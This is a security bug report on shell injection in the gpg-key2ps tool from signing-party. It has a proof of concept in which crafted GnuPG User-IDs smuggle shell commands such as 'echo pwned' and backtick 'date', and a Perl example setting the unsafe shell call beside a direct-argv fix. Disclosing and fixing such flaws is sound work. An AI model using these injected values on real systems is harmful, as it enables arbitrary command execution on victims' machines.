Package: signing-party
Version: 1.1-1
Severity: important
Tags: security
File: /usr/bin/gpg-key2ps
Stefan `Sec` Zehl discovered an unsafe shell call in gpg-key2ps(1), enabling shell injection in User-IDs:

    $ export GNUPGHOME="$(mktemp --tmpdir --directory)"
    $ gpg --passphrase "" --batch --quick-gen-key 'foo"; echo pwned $USER >>/tmp/pwned; echo "bar <us...@example.net>'
    $ gpg --passphrase "" --batch --quick-gen-key 'foo `date >>/tmp/pwned` bar <us...@example.net>'
    $ gpg-key2ps us...@example.net us...@example.net >/dev/null
    $ cat /tmp/pwned
    pwned guilhem
    Tue Apr 30 19:42:48 CEST 2019

-- 
Guilhem.
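As an added illustration, not code from signing-party itself, here is the unsafe call pattern the report describes beside its direct-argv replacement, written in Perl because gpg-key2ps is a Perl script; the subroutine names and the gpg options used are assumptions of this example, not taken from the real script:

```perl
#!/usr/bin/perl
# Added example (not signing-party's code). Shows why interpolating a
# key ID or User-ID into a shell command string is unsafe and how the
# same gpg invocation is made without a shell. Names and options here
# are assumed for illustration, not copied from gpg-key2ps.
use strict;
use warnings;

# Unsafe pattern: the identifier becomes part of a command string that
# /bin/sh parses. A User-ID containing a double quote, ';' or backticks
# (as in the report) is interpreted by the shell before gpg runs.
sub list_key_via_shell {
    my ($id) = @_;
    my @out = `gpg --with-colons --list-keys "$id"`;   # do not do this
    return @out;
}

# Hardened pattern: list-form open() executes gpg directly with an argv
# array. The identifier is delivered to gpg as exactly one argument and
# no shell metacharacter in it is ever parsed.
sub list_key_direct {
    my ($id) = @_;
    open(my $gpg, '-|', 'gpg', '--with-colons', '--list-keys', $id)
        or die "cannot run gpg: $!";
    my @out = <$gpg>;
    close($gpg);
    return @out;
}

# Usage: perl example.pl <key-id-or-uid>
if (@ARGV) {
    print list_key_direct($ARGV[0]);
}
```

The same rule applies to any later step that turns gpg's output back into a command line: pass User-ID text only as an argv element, never through a string the shell reads.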